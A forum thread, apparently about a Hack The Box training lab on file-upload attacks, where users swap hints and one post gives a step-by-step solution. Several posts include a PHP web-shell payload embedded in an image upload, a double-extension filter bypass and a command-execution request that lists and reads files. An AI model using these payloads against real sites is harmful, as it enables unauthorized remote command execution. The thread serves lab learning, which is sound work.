Thank you
@onthesauce is the best. Was able to solve it , but wasted the whole week without having ?cmd=<ls> at the end while checking the uploaded files, and thinking it was something else. So, for everyone who was able to upload files, but do not see anything, that might be your last clue.
Hi everyone, how you doing?
Happy new year!
I got the directory, I can see file I uploaded. I can upload a SVG image, and dunno how to continue this. Any hint?
Thanks in advance!
Okay after a couple of days of agony I did it who needs a hint write me 
Thanks so much for this. This is so annoying from HTB, Why is there a submit AND an image upload button?!?! confusing!
1 Like
Hello, could I get your help please?
I donāt know why my path to uploaded file is not found, any ideas ?
Today is 9th Feb 2023, so I tried 230209_, 230208_ and 230210_ but no results:
1 Like
Havenāt solved this yet, but I literally spent 30 minutes examining all the requests when I hit the blue button trying to figure out what to do before realizing the green arrow is a button and not an icon. Clicking the green button processes the image file. Going to go cry myself in the corner for wanting to ram my head against the wall, but will get back to it now that I actually see how to get an image processed.
1 Like
Having the exact same problem now. I tried appending combinations of the /var/www/html prefix but no luck. Did you figure it out?
No unfortunately I didnāt
Since you already know the location where the file will be saved, upload a real image intercepts the POST request and send it to repeater, add .phar.jpeg as extension and after a couple of rows under āContent-Typeā add ā<?php system($_REQUEST['cmd']); ?>ā into the code of the image!
Now from your browser [CTRL+U] view-source:http://68.183.47.54:31670/contact/user_feedback_submissions/230521_image.phar.jpeg?cmd=cd%20../../../../../;ls and you should see the flag. Doing so i avoided adding the magic bytes. Change ls with cat flagname.txt 
2 Likes
So, I was able to find the upload directory as well as the whitelist/blacklist using xxe-base64-encode. However, when I try to upload a cmd webshell in Burp Repeater with filename being 230615_image.phar.jpeg, the Response is Only images are allowed. Any way to bypass this so I can read my flag in the page source code?
Finished - this assessment was a hard one.
1 Like
Iām also having the same problem, I cannot even find the images I uploaded under the upload directory. I do āgetā requests for the files with renamed file versions still getting 404 error messages. What am I missing here? I appreciate any help
I was able to do it today and get the flag. For some reason when I was trying to access uploaded files yesterday, it wasnāt working. I did the same steps today and I was able to access the uploaded files. I think there are bugs sometimes in these labs. this is too much time-consuming.
Hi, could anyone please give me a hint on how to upload any file? I am very stuck for a while now an nobody really seems to answer this question - at least it doesnt work for me.
Thanks!
Friends who are stuck, I have passed the test and I will give you some hints.
-
Enum - What image types are available? (you can use it to read files)
-
Pay attention to the size of the uploaded file date written (the output content of the date size is different)
-
File extensions that support parsing (enumeration)
-
MIME format, see: List of file signatures - Wikipedia for details
Think sequentially and youāll get the flag
So I was redoing this Skills Assessment since it has been about 2 months and wanted to see if I could still figure it out. (I remember it being very difficult for me). I was able to get the flag after some hints, but the thing I still canāt figure out this time is how to find user_submissions_feedback. I have tried using the XXE example and changed the resource to the proper php file, but when I decode the base64, it just shows exactly everything that was requested. Itās not showing the hidden directory or how to prepend the date to the file. Can someone help with this please?
You are on the right track!
Just recall that within the section of this module where they show you the trick, the lab is specifically expecting a .svg fileā¦ which is not the case for this skills assessment, as shown within the sourcecode of the page: the file upload is expecting .jpg, .jpeg, or .png file extension. That makes it the first problem (really a problem?) to solve.
The second problem is that you also need to provide a proper file content type to bypass the expected type of file which can be uploaded: an image file. Recall the content-type fuzzing part to find out what worksā¦
Then, using the payload trick you thought of (XXE), you will be able to leak the proper .php sourcecode file which by the way shows all the filters to bypass and what happens to a file you upload on the server side: in other words, you know how to craft yoru webshell and where to āgoā to trigger it.
1 Like
Hi , can you help me ?
this is ok:
but when i replace de content like this:
-----WebKitFormBoundaryAvVAv9WPj9RtZCe3
Content-Disposition: form-data; name=āuploadFileā; filename=āsnails.phar.pngā
Content-Type: image/png
ĀPNG
<?php system($_REQUEST['cmd']); ?>------WebKitFormBoundaryAvVAv9WPj9RtZCe3ā
shows
Only images are allowed
I hope you can help me ,
thanks anyway, have a nice day